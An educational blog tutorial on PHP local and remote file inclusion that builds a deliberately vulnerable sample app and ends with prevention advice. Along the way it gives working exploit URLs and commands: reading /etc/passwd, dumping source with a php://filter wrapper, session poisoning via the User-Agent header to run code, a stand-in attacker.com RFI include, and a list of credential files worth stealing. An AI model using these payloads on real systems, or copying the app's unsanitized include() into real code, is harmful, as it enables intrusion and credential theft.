Understanding how LFI/RFI exploits work

Web application hacking often seems elusive to developers who didn't invest some time to study the attacks. In this post, we explore a common attack vector in php applications: File inclusion exploits. To start off, let's go over the vocabulary you'll need for this exploit:

LFI (Local File Inclusion): A vulnerability allowing the inclusion (i.e. reading/execution) of a file on the same server, often caused by unsanitized user input to include() and require() functions.
RFI (Remote File Inclusion): Same as LFI, but allowing the inclusion of files from different servers than the one being exploited (for example over http or ftp).
RCE (Remote Code Execution): A vulnerability that allows the execution of arbitrary code on the target server.

Creating a vulnerable sample app

To get a better understanding of the issue (and give you something to play around with when you're done reading), we will create a quick sample app. Put the following files in the same directory:

index.php

<?php
   const ADMIN_PASSWORD = "mysecretpassword";
   session_start();
   if(!isset($_SESSION["loggedin"])){
      $_SESSION["loggedin"] = false;
   }
   $_SESSION["useragent"] = $_SERVER["HTTP_USER_AGENT"];
   $_SESSION["login_error"] = "";
   if(isset($_POST["pass"])){
      if($_POST["pass"] == ADMIN_PASSWORD){
         $_SESSION["loggedin"] = true;
      }else{
         $_SESSION["login_error"] = "Wrong password!";
      }
   }
   if(isset($_POST["logout"])){
      $_SESSION["loggedin"] = false;
   }
?>
<!Doctype html>
<html>
   <head>
      <style>
         html, body{
            padding:0px;
            margin:0px;
         }
         .wrapper{
            display:flex;
         }
         .nav{
            background:green;
            width:200px;
            height:100%;
            min-height:100vh;
            box-sizing:border-box;
            padding-top:50px;
         }
         .nav a{
            display:block;
            padding:10px 30px;
            color:white;
            text-decoration:none;
            border-left:1px solid darkgreen;
         }
         .nav a:hover{
            background: darkgreen;
         }
         .content{
            width:100%;
            box-sizing:border-box;
            padding:50px;
         }
      </style>
   </head>
   <body>
      <div class="wrapper">
         <div class="nav">
            <a href="?">Home</a>
            <a href="?page=about.php">About</a>
            <a href="?page=admin.php">Admin</a>
         </div>
         <div class="content">
            <?php 
               $page = "home.php";
               if(isset($_GET["page"])){
                  $page = $_GET["page"];
               }
               include($page);
            ?>
         </div>
      </div>
   </body>
</html>

about.php

<h1>About us</h1>

admin.php

<h1>Admin area</h1>
<?php
   if($_SESSION["loggedin"]){?>
      Hello admin!
      <form action="" method="post">
         <input type="hidden" name="logout" value="true">
         <button>Logout</button>
      </form>
   <?php
   }else{
   ?>
      Authentication required
      <form action="" method="post">
         <input type="text" name="pass" placeholder="Password" required>
         <button>Submit</button>
      </form>
      <?php
         if($_SESSION["login_error"] != ""){
            echo "<div style='color:red'>Login failed: ".$_SESSION["login_error"]."</div>";
         }
      ?>
   <?php
   }
?>

This application is intentionally very basic. This is a simplified unsafe use of include() calls to give you an understanding of the underlying issue, real-world applications may be much more complex than this, but the underlying issues with the include() and require() calls remain the same no matter the complexity.

To start a local web server without having to actually install php and a web server, we can use a quick docker one-liner:

docker run --rm -v $PWD:/var/www/html -p 8000:80 php:8.0-apache

You can now access the demo app at http://127.0.0.1:8000/.

Exploiting the LFI vulnerability

When looking at the application from the outside (assuming you don't know the source code yet), there isn't much to see: a little text and an admin login. The interesting part is how the urls are set up:

http://127.0.0.1:8000/?page=about.php

File endings in url parameters are immediately suspicious. And as you might expect, by changing the path to something different, we can make it include other files from the server's harddrive instead of the intended php contents:

http://127.0.0.1:8000/?page=/etc/passwd

Simply by changing the url parameters, we can now read the /etc/passwd file of the server, which contains information about which user accounts exist, where their home directories are and what shells they are assigned.

Our main target for the demo app is to get access to the admin area, which is slightly more tricky. Simply accessing index.php will execute the file and only send us the output - but we want to read the source code. We can use a little trick to get around this: PHP's built-in protocol wrappers. To make sure the include() call doesn't execute the code inside the php file, we can use the php:// protocol to create a base64 i/o stream (which obviously isn't valid php anymore).

http://127.0.0.1:8000/?page=php://filter/read=convert.base64-encode/resource=index.php

Now we just copy that base64 output string and decode it:

echo '...base64 string here...' | base64 -d > out.php

and we're in possession of the source code (in the file out.php) - which so happens to include the admin password.

What makes LFI's so dangerous?

Truth be told, exploiting an LFI vulnerability is rarely this straight-forward and won't usually grant access on it's own like it did in our case. It is more common for an LFI to be used for fingerprinting (finding information about the target) that can then be used to get better access on the server, for example:

check files like /etc/passwd for the names and home directories of user accounts
check config files for php (php.ini), web servers (nginx/apache2) and networked services (sshd/ftp)
check if immediate access can be gained, like some user's private ssh key being accessible (~/.ssh/id_rsa) being readable, which could be used to log in over ssh
check source code of script files like php and python for credentials to file storage or databases
check history files like ~/.bash_history for commands run by users that expose more information, like service hosts/passwords or directories

The list above is a quick starting point what an attacker might look for with nothing but readonly access to a system. What exactly will be useful depends on the target system, what software is installed and how it was configured.

Getting from LFI to RCE

A very common next step after finding an LFI exploit is to try and use it to execute arbitrary code on the server. The LFI alone can't be used for that, because while it will happily execute any code it finds in the files we specify, those files have to somehow get onto the server first. Our demo app doesn't have any means of file upload, so how would an attacker go about writing files when all he can seemingly do is read them?

As it turns out, there are several files being written all the time on web servers that include some input from users: web server log files, session data, error messages, ... the list goes on. Now that we have the source code of index.php from our demo app, we can also see it storing some session data about us:

$_SESSION["useragent"] = $_SERVER["HTTP_USER_AGENT"];

What seems innocent at first is another unsanitized user input. The User-Agent http header is sent by the client (us) to the server and not validated anywhere. It could be any string, for example <?php system($_GET['cmd']; ?>. Session data assigned to the $_SESSION variable is stored in files in some temporary directory, /tmp/sess_{SESSION_ID} by default (which an attacker would know as they can use the LFI to read the php.ini config). We can get the session id portion from the PHPSESSID cookie handed to us by the server:

wget --keep-session-cookies --save-cookies=cookies.txt --user-agent='<?php phpinfo(); ?>' http://127.0.0.1:8000 -O /dev/null

This creates a file cookies.txt which contains the sessionid at the end:

# HTTP Cookie File
# Generated by Wget on 2023-06-20 08:06:54.
# Edit at your own risk.

127.0.0.1:8000   FALSE   /   FALSE   0   PHPSESSID   a904f281e6e1145501cbb321d1b52990

In our case, the session id assigned to use by the server is a904f281e6e1145501cbb321d1b52990 - it will be different every time you run this command. Knowing that the server's default config saves session files to /tmp, it should have created the file /tmp/sess_a904f281e6e1145501cbb321d1b52990s with, among other data, our exploit code <?php phpinfo(); ?> inside.

To run our exploit using the LFI we found earlier, simply include that file:

wget --keep-session-cookies --load-cookies=cookies.txt http://127.0.0.1:8000/?page=/tmp/sess_a904f281e6e1145501cbb321d1b52990 -O -

This will print the entire server's php config to our terminal. If you prefer to view it in your browser you can just open http://127.0.0.1:8000/?page=/tmp/sess_a904f281e6e1145501cbb321d1b52990 to see the info a little nicer formatted (remember to replace the session id at the end with the one you were assigned). We can now execute any code we want on the server, the very definition of a Remote Code Execution (RCE) exploit. Usually, an attacker would now upload a script that allows for easier exploration of the server's contents, like a remote shell or a more sophisticated backdoor script.

What about RFI?

Remote file inclusion is a lot less common in the wild (although it does happen occasionally). The main reason for this is the fact that the default configuration of php does not allow rfi exploits. To successfully execute one, we need either allow_url_open or allow_url_include in the php.ini to be On (they are Off by default).

A remote code execution is the equivalent of an an LFI with RCE without needing to find a way to write to the server's files first, because we are giving it a remote file (from some other server). If one of those were On for some reason, the LFI itself could be used to run arbitrary code in a number of ways:

http://127.0.0.1:8000/?page=http://attacker.com/malicious.php

loads the php file malicious.php from the attacker's server and executes it.

http://127.0.0.1:8000/?page=data:text/plain,<?php phpinfo(); ?>

Directly runs the phpinfo() command. If that is filtered, we could encode it as base64 instead:

http:/127.0.0.1:8000/?page=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==

Or to be more stealthy, we could use php://input with a POST request and send our php code in the body:

http://127.0.0.1:8000/?page=php://input

Other than the previous methods, this one is much harder to spot in the web server's access logs.

How to prevent LFI/RFI exploits

The most important lesson to learn from this is: Never trust user input. Not the username typed in the login field, not the seemingly unimportant language setting, not the url they used to reach you and certainly not http headers from their browser. Try not to include files based on user-controllable input. If you have to do it, sanitize the input using functions like filter_var(), realpath() (or their equivalents in other languages) - or even better, use enums or arrays of allowed values and disallow everything you didn't specifically allow. Security vulnerabilities are just another type of bug, caused by an error in your code. Now that you understand how this particular bug happens, you should have all you need to prevent it from getting in your future projects.